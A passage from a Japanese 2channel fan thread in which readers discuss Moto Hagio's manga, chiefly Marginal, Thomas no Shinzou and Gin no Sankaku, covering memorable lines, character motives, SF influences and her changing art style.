リアリティを感じるんだろうが。
>そしてそれをキャッチーなセリフで現わすのが上手いんだろうな。

と、読んでいただければありがたいです。

86 :花と名無しさん:2007/01/11(木) 13:32:14 ID:???0
>>84
>「自分で稼げもしない者がポットを割る資格なんかない」とか、

『トーマの心臓』のキンブルグ弁護士のセリフだね。
あのシーンは私も好き。
「君はまだ一ペニヒだって自分で働いて得たこともないくせに
人の作ったものを、たんなる気まぐれでぶちこわすなんてもってのほかだ!」
ああいう風に叱られたら、私も一言も言い返せないだろうな。

87 :花と名無しさん:2007/01/11(木) 14:27:28 ID:???0
思い返してみると本当に印象に残るセリフとか多い。
「愛のほかは全部くれると言った!」なんか特にそう。
あの一言にこめられたナースタースの心が凄く伝わるよね。

88 :花と名無しさん:2007/01/11(木) 15:34:51 ID:???0
>>87
あの台詞、前後の言葉を続けて言うと切なさ倍増なんだよね…

きらわれてたのはわたしよ!わたしに指一本触れなかった!
 (…なぜ彼に言わなかった?愛していると)
言ったわよ 足にすがりついて言ったわよ
彼はオクターブ家の継承権も財産権もカンパニーもわたしにくれた
アルファ・ケンタウリもくれると言った

それならわたしは全部もらうわ!愛のほかは全部くれると言った!!

89 :花と名無しさん:2007/01/11(木) 21:22:58 ID:???0
私もナースタースのあのセリフ大好きだ。
ずっと想いあってたのに、それだけじゃ駄目だったんだな…


でも、ラブラブ状態のメイヤードとナースタースというのも
なかなかスゴそうなw

90 :花と名無しさん:2007/01/11(木) 21:45:13 ID:???0
メイヤードはナースタースを愛してたと思うんだが
肉体的なコンプレックスが邪魔して拒絶してたのかね。
あそこまで愛してたならプラトニックな間柄でも
彼女は満足したんじゃなかろうか。

91 :花と名無しさん:2007/01/11(木) 21:56:46 ID:???0
たぶんコンプレックスのレベルじゃなかったんじゃないかな。
幼馴染的な台詞も出てきてたから、まだ男でも女でもない子供のころから
お互い仲良くて好きだったのに、思春期とか二次成長とかが来たときに
メイヤードの方だけが気持ちを残したまま脱落してしまって、男性になれなかった、
それからどんどん距離が広がっていった っぽい感じ…。勝手な印象だけど。

メイヤードの「ナ…ス タ…ス」もほんとに好き。毎回読むと泣きそうになる。

92 :花と名無しさん:2007/01/11(木) 22:03:12 ID:???0
メイヤードって不能なんだっけ?

93 :花と名無しさん:2007/01/11(木) 22:04:16 ID:???0
>>91
それに加えて、ナースタースには自分のようなハンパな男ではなく、
ちゃんとした男と幸せになってもらいたい、とも思ってたんだろうな。

「ハンパ」とか「ちゃんとした」、ってのは、メイヤード自身がそう考えていた
だろう、ってことね、もちろん。

ナースタースの方は「メイヤード」という人間自体が重要なのであって、
彼が抱えたいろんな問題は二の次だった、ってことを、メイヤード本人
は理解してなかったんだろうな、と。
そのへんの(お互いを思いやったせいでの)スレ違いも哀しいんだよね…。

94 :花と名無しさん:2007/01/11(木) 22:15:59 ID:???0
>92
かなー? と思ってるけど…
あと、女性みたく胸があるとか子供を作るのを禁じられてるとかも…

95 :花と名無しさん:2007/01/11(木) 22:29:19 ID:???0
>>91
> メイヤードの「ナ…ス タ…ス」もほんとに好き。毎回読むと泣きそうになる。
メイヤードを看取ったアシジンには意味がわからなくて、
ナースタースはそれを伝言で聞いてるっていうのがまた切なくて泣ける。
スレの流れをきっかけに読み返してまた泣きそうになったよ。

ところでここで話題にすべきことじゃないんだろうけど
ギムナジウムカフェって執事喫茶みたいなのを作るって企画があって、
そこのブログ読んだら、「トーマ」を傷物にされてるみたいで気分悪くなった。

96 :花と名無しさん:2007/01/11(木) 22:31:42 ID:???0
子孫を残すことを禁じられたメイヤードの子がキラで
しかもメイヤードが自分と重ねて見ていた不毛の地球で
唯一妊娠している存在ってのがまたすごいプロットだよなぁ。

97 :花と名無しさん:2007/01/11(木) 23:49:02 ID:???0
>「君はまだ一ペニヒだって自分で働いて得たこともないくせに
>人の作ったものを、たんなる気まぐれでぶちこわすなんてもってのほかだ!」

似たようなことを、
母からも小学校の教師からも言われたことがある(その後、中学でトーマを読んだ)

よくある説教話、としか思ってなかったけど、今の若い人には新鮮なのかな

>>96
すごいというか皮肉というか何というか。
『マージナル』はいろいろと複雑で奥が深くて、
萩尾作品の中では個人的にトップクラス。
冒頭のキラが砂漠をさまようシーン、映画のようで新鮮だった。
萩尾さんが夢で見たという話だが、その夢からあんな作品を創り出してしまうところに感銘を受ける


98 :花と名無しさん:2007/01/12(金) 00:04:33 ID:???0
>>97
今の若い人、じゃなくても1円も稼いでない歳の頃にこの一文に
触れたら感じる事はあるだろう。
自分は小5でトーマを読んだ昔の若い人だが当時このセリフは好きだった。

99 :花と名無しさん:2007/01/12(金) 01:05:05 ID:???0
実際に言われたことがあるかどうか、っていう問題でもないんでは。
ちなみに自分は癇癪起こすとキーッてなってモノに当たる子どもだったので
そのセリフはすごい胸に突き刺さったが、
実際に親や教師に言われたら、かえって逆上してたかもしれんw


100 :花と名無しさん:2007/01/12(金) 01:32:02 ID:???0
100get!

101 :花と名無しさん:2007/01/12(金) 13:05:36 ID:???0
>>95
>ギムナジウムカフェ

脳内だけにとどめておけばいいのにほんとに出店するのか。

102 :花と名無しさん:2007/01/12(金) 13:13:21 ID:???0
>ギムナジウムカフェ

ウェイターが全員ドイツ人少年とかならちょっと行ってみたい。

103 :花と名無しさん:2007/01/12(金) 18:15:12 ID:???0
>>96
そのキラが、不毛の地球(=自分)を蘇らせることのできる唯一の存在、ってのがまた凄い。
メイヤードが報われなくて可哀想っていう感想をよく見るけど、
この時点で彼にはじゅうぶんな救いが用意されていたと思う。

また萩尾さんの長編SFが読みたいなー。描いてくれないかな。

104 :花と名無しさん:2007/01/12(金) 20:55:32 ID:???0
>>99
>実際に親や教師に言われたら、かえって逆上してたかもしれんw

なるほど
しかし、そー言われると親や教師ってのは大変なんだな

105 :花と名無しさん:2007/01/13(土) 00:01:54 ID:???0
はてなのマージナルの解説?の
「萩尾の裏メッセージ」って結構厳しいよね。
自分は読んでてあそこまで感じなかったからちょっとびっくりした。

106 :花と名無しさん:2007/01/13(土) 00:49:34 ID:???0
http://d.hatena.ne.jp/keyword/%a1??%bc%a5%b8%a5?%eb%a1%d9

>そして、それを予見した反乱者が「マザ」の暗殺を画策していた。
裏でこの世界を操っている高度な科学技術を持った組織「センター」
が「マージナル」の破滅を推し進めていると気付いたからだ。

これってちょっと違うような希ガス
単純に婆マザあぼーん→新マザ誕生&子供ポンポン出産→子供配給ウマー
を狙ってただけじゃないかと…

センターへの不信感程度ならあるかも知れないけど
メイヤードがマザ更新打ち切りを考えてたことは知らなかったはずだよね。
世界の仕組み自体知らされず騙されてるわけだし。

107 :花と名無しさん:2007/01/13(土) 01:09:39 ID:???0
>>106
> 単純に婆マザあぼーん→新マザ誕生&子供ポンポン出産→子供配給ウマー
> を狙ってただけじゃないかと…

うん、私もそう思ってた。でもなんかこう、「新マザがちゃんと生まれる」って件については
アシジンは単純に前向きに信じてたけど、
グリンジャは「生まれない かも しれない」とは思ってたような気もする。

それがマザの老いとともに世界中にひしひしと押し寄せる「滅びの感覚」に過ぎないのか、
世界を滅ぼすに等しい「マザ殺し」「母殺し」の大罪を犯すために暗殺者として育てられた
グリンジャならではなのか、それはちょっとわからないんだけど。

(後者は、
「それほどの大罪を犯すからには、もう新しいマザは罪深い自分達に恵まれないのではないか」
とグリンジャは考えたんじゃないかってことね)

アシジンでなくそんな彼の方がキラの身体に配偶者として選ばれたってのも皮肉というか奇跡というか…

108 :花と名無しさん:2007/01/13(土) 01:12:48 ID:???0
>>107が変な書き方だったなあ。ちょっと追加訂正させて…

グリンジャの仲間は
> 婆マザあぼーん→新マザ誕生&子供ポンポン出産→子供配給ウマー
を狙ってたと思う。
だけど、グリンジャ自身は新しいマザ誕生と世界再生に、割と懐疑的な描写だった、ような気がする。


109 :花と名無しさん:2007/01/13(土) 01:33:42 ID:???0
>>108それで合ってたとおも。

夢の子供を作り出したアイリーンとポール(だっけ?)が、二人の作った
楽園のドームの中で狂ってしまったのが衝撃的だったな。


110 :花と名無しさん:2007/01/13(土) 14:15:08 ID:???0
>>109
アーリンとイワンだよぅw

111 :花と名無しさん:2007/01/13(土) 14:38:38 ID:???0
既出の話かもしれないけど、ここんとこ銀の三角を読みかえしていて
考えても混乱してしまう一点・・・。
マーリーがラグトーリンを初めて訪ねていった時、ラグトーリンはマーリーのことも
エロキュスのことも「知らなかった」 マーリーと出会った後ラグトーリンは
古代でエロキュスを探しあてこれを現代に転生させた・・・。

しかしエロキュスが存在しなければマーリーはラグトーリンのところに行くことも
なかったわけで、完全に円環状態。頭がぐるぐるする。
この状態でラグトーリンはマーリーがエロキュスを殺さないようにマーリー消去を
もくろむが、それって深刻なパラドックスになるからできないじゃーん。
マーリーがそもそも存在しなければ、ラグトーリンはエロキュスの存在も知り得ない。
ぐるぐる。

それとも、マーリーの居る世界とラグトーリンのいる世界はパラレルワールドで
お隣の世界なのだろうか・・・。
銀の三角はかなり緻密に作られているお話なので、なにか答えがあると思うのですが
・・・賢い人どなたかわかりませんか?

112 :花と名無しさん:2007/01/13(土) 15:14:47 ID:???0
ラグトーリンがシミュレーションゲームをしているようなもんだと思えばおk
複数のルートをプレイした記憶はデータを消してもなくならない

113 :花と名無しさん:2007/01/13(土) 20:29:53 ID:???0
ラグトーリンはデスクトップ上で世界を見てるようなもん。

114 :花と名無しさん:2007/01/13(土) 20:58:13 ID:???0
パソコンが身近でない時代に、人格のバックアップ(銀の三角・A-A')とか、
アンドゥリドゥの繰り返し(酔夢・銀の三角・とか、初期設定以降の蓄積データは
ハードウェアを複製しても反映されない(A-A'・スターレッド)とか、
よく描いたなーと30年近く追い続けてきて改めて思うな…

最後のアイデアは「初期設定以降のデータが実は初期化しても残っていて、
方法さえ正しければ新しいハードに移植できる」(バルバラ)と発展したのも面白い

脳以外のところに何か記憶が残って…ってネタは、マージナルでは子宮だったよね

115 :花と名無しさん:2007/01/13(土) 21:00:01 ID:???0
>>114の2行目

× > (酔夢・銀の三角・とか
○ > (酔夢・銀の三角・バルバラ)とか

116 :花と名無しさん:2007/01/13(土) 22:09:45 ID:???0
>>114
人格(とゆーか記憶・経験)のバックアップ、というアイデア自体は、
80年代にジョン・ヴァーリイというSF作家が発案したのがきっかけだと思われ。

クローン再生というのが、昔考えられていた「コピー人間」ではなく、結局は
時間差で双生児を作るだけ、しかも最初から成体を育成しても「脳」は赤ん坊の
ままでしかない、ということがわかってきて、「じゃあ記憶もコピーとっといて
写せばいい」という発想……になったのは、カセットテープとかPCの記憶媒体
なんかが一般的に使われるようになったため、なんだろうけど、ある種の
「目からウロコ」な発想だったんですな。

一角獣シリーズは、全体に(当時日本でも翻訳が出たばかりで新鮮だった)
ヴァーリイの「八世界シリーズ」の影響が強いっす。クローン+記憶のバックアップ、
遺伝子改造でちょっと異形なヒトを作る、性転換などなど。

そこから一気に「銀の三角」みたいな方向の発想が出てくるあたりは、萩尾さん
らしいところだ、とつくづく思いましたが。

117 :花と名無しさん:2007/01/13(土) 22:27:44 ID:???0
>>116って文筆業?

118 :花と名無しさん:2007/01/13(土) 22:51:06 ID:???0
マージナルの、知識や記憶を共有する複数の肉体ってのは「人間以上」の影響かな?

119 :花と名無しさん:2007/01/13(土) 22:57:09 ID:dY9ahzrx0
>>116
「へびつかい座ホットライン」?

120 :花と名無しさん:2007/01/13(土) 22:58:20 ID:???0
ごめんageちゃった…

121 :花と名無しさん:2007/01/13(土) 23:55:34 ID:???0
わたしはキラの兄弟の、赤んぼのまんまの子は009のイワンを連想してしまったw

122 :花と名無しさん:2007/01/14(日) 00:10:32 ID:???0
009も「人間以上」の影響受けてるとよく言われてるね

123 :花と名無しさん:2007/01/14(日) 04:10:48 ID:???0
【漫画】竹宮恵子「地球(テラ)へ…」テレビアニメ化決定 4月からMBS・TBS系で放送
http://news22.2ch.net/test/read.cgi/moeplus/1168425454/

スレ違いなのは承知していますがなんとなくうれしかったので

「百億の昼と千億の夜」その他の荻尾アニメも見てみたい


記憶のバックアップといえば「カンザスの幽霊」(『残像』に収録)がそれはもう印象的





124 :花と名無しさん:2007/01/14(日) 07:36:34 ID:???0
>>123
荻尾アニメ

( ´,_ゝ`)プッ


125 :花と名無しさん:2007/01/14(日) 11:59:44 ID:???0
>>123
『地球(テラ)へ…』、原作読んだ事ないんだけど、
面白そうなのでアニメ観てみようかな^^。

126 :花と名無しさん:2007/01/14(日) 23:22:36 ID:???0
>107-108
>アシジンでなくそんな彼の方がキラの身体に配偶者として選ばれた
それでも最後にキラ(二号のほう)がグリンジャでなくアシジンの頭をさわったところに
何かこう、未来は明るいんだなーという象徴があって好きだな。

127 :花と名無しさん:2007/01/14(日) 23:31:38 ID:???0
126を書いてて思ったんだけど、そういや萩尾の中〜長編漫画は
どれも読後感がいいのが多いね。
きちんと結末があって、さらに結末の先を読者に予感させるというか(ポーはちょっと違うかな?
これほど多種多様なジャンルで、一つ一つの物語が綺麗に完結している事にあらためて驚き。

128 :花と名無しさん:2007/01/15(月) 00:37:13 ID:???0
>>キラ(二号のほう)

本妻に対する「二号さん」のほうで想像してワロてしもた。
あれは本能的に種の強そうなほうを選んだってことなのか。
メイヤードの遺伝子もちっとは影響してるんだろうな。



129 :花と名無しさん:2007/01/15(月) 01:23:52 ID:???0
>>127
マージナルのラストはメイヤードにも救いを感じされると思う。
「ナースタースが突然地球の再生に興味持って云々」ってのは本当に切なかった。
「新しい名前を付けよう」ってのも好きだ。

マージナルもスターレッドもトーマもバルバラも
「人とか世界とかを愛する心で救われる」話だと思った
言葉にすると陳腐だけど、作品読むと全然陳腐でない

130 :花と名無しさん:2007/01/15(月) 02:36:43 ID:???0
>>128
うん、「愛」っていう不確定要素が予想外の結果を生み出すんだよね。

スターレッドの最後の火星人である2世のセイはあれからどうなるんだろう?

131 :花と名無しさん:2007/01/15(月) 05:03:49 ID:???0
ラバーバはジュニア・セイがもう少し大きくなったら地球を離れるとか
ゆうてたね。あの時代には太陽系外にも植民してたんだっけ?
あの宇宙船でどこまで行ったのだろうか・・・。

132 :花と名無しさん:2007/01/15(月) 16:11:20 ID:???0
禁煙セラピーを読んでから
オスカーへの見解が変わった。
オスカーは愚か者の臆病者

133 :花と名無しさん:2007/01/15(月) 17:20:41 ID:???0
オスカーだって大人ぶっててもまだ子供だもの

134 :花と名無しさん:2007/01/15(月) 21:36:42 ID:???0
キラが地球を救うだろうというラストはメイヤードの無意識の望みだよね。
洪水で流されて行くときの「青い海」の幻影は、死にゆくメイヤードのイメージにシンクロしたものかと。
ゴー博士に「私の好きなビデオ」って昔の地球の海の映像見せてたし。
結局病める地球を救ったのは、地球と心中するつもりだったメイヤードだったってのが何とも切なくて後を引くんだなあ。

135 :花と名無しさん:2007/01/15(月) 21:40:09 ID:???0
>>132
また時代を知らない厨房か。

136 :花と名無しさん:2007/01/15(月) 22:06:52 ID:???0
>>134
メイヤードの最後の言葉を知ったナースタースが
地球の再生計画を支援するって
まるで、幸福な出産のようだな。

137 :花と名無しさん:2007/01/15(月) 23:40:19 ID:???0
>>116
なるほど
面白そうだから読んでみよう

>人格(とゆーか記憶・経験)のバックアップ、というアイデア自体は、

ただ、これはもっと以前からあるアイデアのような気がする
(ヴァーリイがきちんとまとめあげたのかもしれないけれど)
60年代とか70年代とか、具体的に作品を挙げられなくて申し訳ないんだけれど
漫画だったかもしれん……

いずれにしても、萩尾さんの発想や演出、構成力には脱帽

138 :花と名無しさん:2007/01/16(火) 14:20:02 ID:???0
>>128
本妻がグリンジャに拾われてああなったのと同じように、
二号さんはもともと、アシジンに「対応」してたんだと思う。
だから岩屋の近くの氷室で発見されたんでは?
「3人は岩屋でいつまでも幸せに暮らしました」はありえなさそうだし。

139 :花と名無しさん:2007/01/16(火) 20:44:42 ID:???0
そっそーなのかなぁ。
3人暮らしはやっぱムリですか・・・

140 :花と名無しさん:2007/01/16(火) 21:14:56 ID:???0
私は3人くらし説に一票。
グリンジャはちょっと隠居はいったキャラだし、
なんか不思議なバランスとりながら3人でなんとかやってくでしょ。
そのあと別れるにしてもね・・・
一夫一婦だけがある道ではないよ。あんな社会だし。

141 :花と名無しさん:2007/01/16(火) 22:39:42 ID:???0
自分も3人暮らし派だな。
元々男だらけの世界だったし、いきなり一夫一婦になるより自然。
あのエンディングには調和を感じたし。

142 :花と名無しさん:2007/01/17(水) 00:25:04 ID:???0
どっちにしろ若死にするんだよね…と落ち込むようなことを言ってみる

143 :花と名無しさん:2007/01/17(水) 02:04:58 ID:???0
3って特別な数なんでしょうか。
三年目の毬絵とかオスカー父母と校長
3ってよりはこれは女1人に男2人か。

あと銀の三角。
ほかなんかない?

144 :花と名無しさん:2007/01/17(水) 07:10:27 ID:???0
>>143
『十年目の毬絵』。

145 :花と名無しさん:2007/01/17(水) 12:48:52 ID:???0
安定した数字であるし
あと最も小さい人間社会は「3人」から始まるし
1対2という構図がしばしば生じるので話にふくらみや厚みを出しやすいんじゃないか



146 :花と名無しさん:2007/01/17(水) 14:20:52 ID:???0
>>143
トーマとエーリクとユーリの人。

147 :花と名無しさん:2007/01/17(水) 15:29:25 ID:???0
新しい名前をつけようって事でキラとは別人格って
二人ともちゃんと分かっているのがいいと思う。
3人で暮らしてあの子が選んだ方と自然に結ばれそう。

148 :花と名無しさん:2007/01/17(水) 21:45:56 ID:???0
グリンジャとは女子としてアシジンとは少年として付き合うんじゃまいか。>新キラ

149 :花と名無しさん:2007/01/17(水) 22:24:20 ID:???0
すっごく基本的な質問していい?
最終的に地球では女性が赤ちゃんが産めるようになったの?
それともキラの遺伝子を持つ子だけが妊娠可能?

150 :花と名無しさん:2007/01/17(水) 22:35:32 ID:???0
>>149
まだ、あの段階(最終回ラストシーン)では確定してないはず。

グリンジャとアシジンのところに行ったキラは、事前に胎内の卵巣を
片方取り出されてて、これは最後に出てきた双子の黒人医師(生物
学者?)がいろいろ分析して調べてる最中。

もう片方は温存したまま、実際に地球で暮らさせてみてどうなるか、
経過を観察しよう、ってところだと思う。

「地球に溶けた」方のキラが受胎したメカニズムや、決定的な要因とかは
まだはっきりしてなかったんじゃないかと。
グリンジャに対して「あんたに対応する」と言ってたから、なにかしらその
へんを起動させるきっかけはあったんだろうけど…。

151 :花と名無しさん:2007/01/17(水) 23:04:31 ID:???0
新しい名前を付けようのくだり凄く好き。

ただ、最初のキラが自分の名前を覚えてなかったからって
氷室のキラもそうとは限らないんじゃ?と思ったな。
だから新しい名前を付ける前に
「お前の名は」と聞くのがスジだろうとw

名前があるってアーリンが言ってたよね?

152 :花と名無しさん:2007/01/17(水) 23:24:37 ID:???0
そのへんの食い違いは連れ帰って話してる内にわかるかとw

153 :花と名無しさん:2007/01/17(水) 23:27:27 ID:???0
>>151
最初はひとりずつ別々の名前をつけたけど、「みんな同じ」だと気付いてからは
キラとしか呼んでなかったのでは?

154 :花と名無しさん:2007/01/17(水) 23:34:32 ID:???0
安易に「キラが帰ってきた」ってならないところが好きだ。

トーマとエーリクの関係もそんな感じだよな。
似てるから同一視されるけど、エーリクにとっちゃ「誰? それ?」状態。

155 :花と名無しさん:2007/01/18(木) 00:09:10 ID:???0
>>150
dd
とりあえずあの世界では当分は男だけで子どもはよそからもらってくるんだね
マザ制度とかどうなるのかな
図書の家が新しい歴史教育とか始めるのかな

メリーベルとアランの関係は、不老不死な分だけ辛さ倍増だね(´;ω;`)

156 :花と名無しさん:2007/01/18(木) 09:16:39 ID:???0
図書はエドモスとカレンによって立て直され、色々見聞した
エドモスは新しい歴史の本を書くのかなぁと思った。
しかしカレンは最初エドモスのどこがよかったのかなw

157 :花と名無しさん:2007/01/18(木) 10:18:14 ID:???0
>>151
そりゃそれが正論だろーけどw
あのセリフは
「子供を産むためにつくられた夢の子供・キラ」ではなく
ただの人間として生きていくのだ、という意味だしょ

158 :花と名無しさん:2007/01/18(木) 13:40:31 ID:???0
あのエメラダも選んだくらいだから相当いい男なんじゃないかエドモス。
頭良さそうだし。(エメラダに関してはちょっと盲目的になりがちだけど)
エドモスの色子期ってどんなんだろうね?
カレンも将来髭を蓄えた立派なオッサンになるのかなー想像つかないw

159 :花と名無しさん:2007/01/18(木) 17:03:43 ID:???0
よく考えたら美形同士より
マッチョと美形の方がわりと現実的だね

160 :花と名無しさん:2007/01/18(木) 17:05:38 ID:???0
エメラダ…最強ツンデレだよね。ツンだけで終わった…w

161 :花と名無しさん:2007/01/18(木) 17:16:39 ID:???0
もっと現実的なのはマッチョとマッチョ

162 :花と名無しさん:2007/01/18(木) 19:32:09 ID:???0
>>156
カレンってきれーだから、みんなにチヤホヤされて暮らしてたんでしょ。
んで、硬派なエドモスが自分に見向きもしないとこに魅かれちゃったんじゃないかなー。

163 :花と名無しさん:2007/01/18(木) 19:38:41 ID:???0
年齢的にエドモスの方がエメラダより年上だよね?
どういういきさつで図書の人間になったんだろう。
サキ老の色子だったのかな?

164 :花と名無しさん:2007/01/18(木) 19:40:16 ID:???0
>>163
変な日本語になったorz(年齢的と年上)
サキ老も何歳くらいなのか不明だなぁ。
ミカルの父に教えていたのだから
マージナルでは長生きしたんだろうけど。

165 :花と名無しさん:2007/01/18(木) 19:56:23 ID:???0
マージナルで長生きということは、40歳くらいか。

166 :花と名無しさん:2007/01/19(金) 01:28:04 ID:???0
エメラダ、エメラダばっかり言ってるせいか
申し訳ないけどあんまり頭が良さそうに見えないな、エドモス。
好きだけど。

167 :花と名無しさん:2007/01/19(金) 04:08:13 ID:???0
>>166
男女問わず、頭はよくなくても朴訥で誠実で…ってキャラよく描くよね。私も好き。

168 :花と名無しさん:2007/01/19(金) 12:39:43 ID:???0
>>167
名前忘れちゃったけど、ラグトーリンに惚れる彼もそのタイプだよね。
もう髪を見せろとも言わん!って…彼も好き。

169 :花と名無しさん:2007/01/19(金) 15:47:23 ID:???0
マージナルのキャラはアシジンといいミカルといい
ジューシーといいカレンといい
良くも悪くも素直で自分に正直な人が多くて癒される
無知と紙一重の素直さなんだろうけど

170 :花と名無しさん:2007/01/19(金) 16:23:09 ID:???0
>>167-168
ああいう人は現実世界にもいるんだろうかと考えたら
「北の国から」の田中邦衛が思い浮かんでしまった

171 :花と名無しさん:2007/01/19(金) 16:46:27 ID:???0
エメラダが最強かわいそうっつーか、損したキャラだと思う。

172 :花と名無しさん:2007/01/19(金) 16:51:47 ID:???0
……エメラダ、エドモスの色子だったときはすげーはかなげな美人で
確かに「女とも見まごう」って感じだったのに、マザに改造されたら
なんか妙にガタイのいい「厚化粧のオカマ」みたいになっちゃって
たっけなあ。

シロイツキを指に留まらせてにっこり笑った大ゴマとか、特にそんな
感じがした。

173 :花と名無しさん:2007/01/19(金) 17:25:04 ID:???0
私、メッシュは甲斐祥弘+尾崎豊ってイメージで見てたけど違うよね・・
あと、ナディアは足首の太い斉藤由(ry とか・・  ごめ

174 :花と名無しさん:2007/01/19(金) 17:57:46 ID:???0
>>172
男の格好だと「男にしては」女っぽいところが強調されるんだよ
でも、実際女の格好をすると本物の女よりかごついから。

175 :花と名無しさん:2007/01/19(金) 18:41:14 ID:???O
最近トーマを初めて読んだんだけど、オスカーがアンテの気持ちに気づくの遅くない?
もっと鋭いキャラだと思ったんだけど

176 :花と名無しさん:2007/01/19(金) 21:07:39 ID:???0
>>149
遅レスだけど

あのラストは「地球規模での再生」という話だったから
とてつもなく長い期間が必要で、
ナースタースの寿命内程度では結論でない……と自分は思った

ただ人類の多くは地球外に生存しているので、
その支援態勢が続く限りマージナル社会を維持していくことはできそうだけど

177 :花と名無しさん:2007/01/20(土) 01:41:54 ID:???0
>>175
人の周りをうろちょろしてるクソガキにしか見えない段階で
気づける方が特殊なのでは。

178 :花と名無しさん:2007/01/20(土) 01:50:32 ID:???0
エメラダって、
上手く言えないんだけど変に「役割」を生きてる感じがする。
「図書の家の」とか「ハレルヤとしての」とか。

エドモスと喧嘩してるシーンが好きだな。
あれが何も演じてない生のままのエメラダだと思うから。

179 :花と名無しさん:2007/01/20(土) 13:10:14 ID:???0
>>177
感のするどい人ならうろちょろしてるあたりで気付くよー
オスカーは興味のある人に対しては鋭いけど、興味ない人にはまったくない人。

180 :花と名無しさん:2007/01/20(土) 17:33:18 ID:???0
そこまでくると現実世界では「するどい」じゃなくって思い込みが激しいとか、
妄想とか、なんでも自分の都合よく考える人とか言うと思う。

181 :花と名無しさん:2007/01/21(日) 13:26:09 ID:???0
興味のないものについては、目には入っていても見ていない、
無関心というのはそういうことだ。


182 :花と名無しさん:2007/01/21(日) 13:36:31 ID:???0
>>179
エスパーじゃないんだから気づかなくて当たり前。
他人の気持ちなんてそうそう理解できるものじゃない。
しかも関心も無い人間から関心持たれてもウザイだけ。

183 :花と名無しさん:2007/01/21(日) 16:00:39 ID:???0
まーだから、175はオスカーをもっと神経細やかで、回りに気を配るタイプだと
思ってたってことでしょ。でも、オスカーはそうでもなかったと。

184 :花と名無しさん:2007/01/21(日) 17:14:54 ID:???0
アンテまで気を配ってたら身が持たんだろうが。

185 :花と名無しさん:2007/01/21(日) 17:40:19 ID:???0
若い内はオスカーがすっごく大人でいい人に見えるけど、年とると見え方が
違って来るんだよ
オスカーもごく普通の人間だし、別にそれは悪いことじゃない。

186 :花と名無しさん:2007/01/21(日) 18:27:53 ID:???0
でもオスカーがアンテの気持ちに早めに気づく設定にしてたら
アンテのキャラが生きてこない気がする。なかなか伝わらないから
生意気だけどちょっとかわいそうだなって思えるんじゃないかと

187 :花と名無しさん:2007/01/21(日) 18:45:13 ID:???0
私の中ではアンテと、マージナルのカレンがダブる。
あとあとになんだ真面目ないい子なんじゃん、実は、と分かるタイプ。
からかいでキスなんかして不良ぶってたオスカーも
後になって実はユーリ一本だったことがわかるわけで、、。
ピュアな純愛の交錯が見えてきてラストの救いに昇華する、と。


188 :花と名無しさん:2007/01/21(日) 19:15:20 ID:???0
そうそう、オスカーもユーリのことを追うのに必死で
周りが見えてないんだよね。だからアンテが「目に入らない」。
と、アンテも思うことで自分を納得させようとしてたのに、
ポっと出てきたエーリクはするりとオスカーの懐に入れてしまったんで
ガーン!とかなっちゃったんだろうな。

189 :175:2007/01/21(日) 20:26:14 ID:???O
177からのレスと合わせて何度も読み返してみたら、色々納得。
あと、訪問者も読んでちょっと泣いた。
確かにオスカーだって普通の人間で、まだ15、6?の子供なんだよね。大人ぶってても。


関係ないけど、何度読んでもバッカスとかサイフリートが年下に思えない……。

190 :花と名無しさん:2007/01/21(日) 22:00:07 ID:???0
まあエーリクの場合は、ユーリに直接的にあれこれ絡んできたから、
オスカーとしても特に注目せざるを得ない存在だった、つーのはあるわな。

191 :花と名無しさん:2007/01/21(日) 22:18:43 ID:???0
オスカー好き好きであんなことになってしまったけど
アンテもそんなに悪い子じゃなかったね。
レドヴィみたいのは普段何考えてるかわからないキャラなだけに
真を突いてくるとこにどきっとする。
オスカーもユーリが好きだったけど南米へ行ったグスタフ親父に
重ねて見てる部分もあったろうし、みんながみんな切ない片思いなんだよな。

192 :花と名無しさん:2007/01/21(日) 23:50:34 ID:???0
話ぶったぎるけど、吾妻さんの「逃亡日記」読んでたら、
2006年の手塚治虫文化賞の授賞式の話で、萩尾さんと
話してるシーンがちょっとだけ出てた。

「最近、お酒飲むと記憶なくすんですよー」
「ははは 危ねえな」

「ははは」で済ませていいんかいw

193 :花と名無しさん:2007/01/22(月) 01:22:58 ID:???0
ポーの一族の絵はすごい美少年と美少女と美女だらけで
(美男はいなかったような気もする)
話もおもしろいし、とにかくすごく綺麗な絵なのに、
なんでその数年後には絵が変なんですか?(´・ω・)

残神は、話が面白いから読むのやめられなくて読んだけど絵が…
グレッグに結婚をキャンセルされた時だったかのサンドラが動揺してるコマとか
人体と空間が歪みすぎてません?

時間がたてば、絵柄が変わってしまうのは、どの漫画家さんでもそうだし
しょうがないと思うんですけど、萩尾さんはちょっと変わりすぎじゃないですか?
てか、絵が良かった時期が短過ぎませんか
白い鳥になった少女のあたりはプロとしてどうよな絵で
その翌年にはポーで神な絵で、そのまた5年後は絵が崩れててそのまま20年崩れっぱなし
イグアナの娘の文庫とか、何この歪んだ人体って感じだし

194 :花と名無しさん:2007/01/22(月) 01:45:41 ID:???0
ポーの頃より、エッグスタンドの頃の絵が私的に神。
そのへんはひとそれぞれだろうけど

195 :花と名無しさん:2007/01/22(月) 02:17:19 ID:???0
>(美男はいなかったような気もする)
オズワルドもだめかい?いい男
上手いとか崩れてるとかはわからんからどうでもいいやw
ネットで素人に同意を求めるより、美大生とかに見てもらってくれ

好きな絵はエッグスタンドとか訪問者あたりだな
読めない程ではないけど今の絵は苦手
でもライカは私的最高の萌えキャラ
ライカとマシロのコンビがなんかやらかすシリーズ漫画が読みたい

196 :花と名無しさん:2007/01/22(月) 02:53:17 ID:???0
自分は逆にポーや訪問者の頃の耽美?っぽい感じが駄目。
修飾が多すぎるというか…。
ポーとバルバラの中間、マージナルあたりが一番すきだな。アシジンの髪が神だ。
やっぱ好みでしょう。

197 :花と名無しさん:2007/01/22(月) 03:29:21 ID:???O
トーマ、訪問者、半神、11人いる!の絵柄が好き。

198 :花と名無しさん:2007/01/22(月) 03:32:07 ID:???0
グレンスミスもなかなかいい男だと思うが。

199 :花と名無しさん:2007/01/22(月) 03:32:55 ID:???0
私は、『小鳥の巣』の頃の画が一番好きだ。個人的に。

200 :花と名無しさん:2007/01/22(月) 05:41:25 ID:???0
>>192
ハハハの方が萩尾さん発言?
まさか記憶なくす方か
逃亡日記早く読みたいなー

201 :花と名無しさん:2007/01/22(月) 13:29:22 ID:???0
吾妻ひでおの新刊が出たんだ!>『逃亡日記』

……と思ったら、エッセイなのかー。とりあえず書店で見てみるか

202 :花と名無しさん:2007/01/22(月) 14:02:35 ID:???0
20年以上の絵柄の変化の差を言われてもなぁ
いつ時代の絵をみてもそれぞれ好ましく思うけど、
今誰か別の若い作家がポー時代の繊細な絵で作品描いても、
きっと古いタッチだなぁとか、
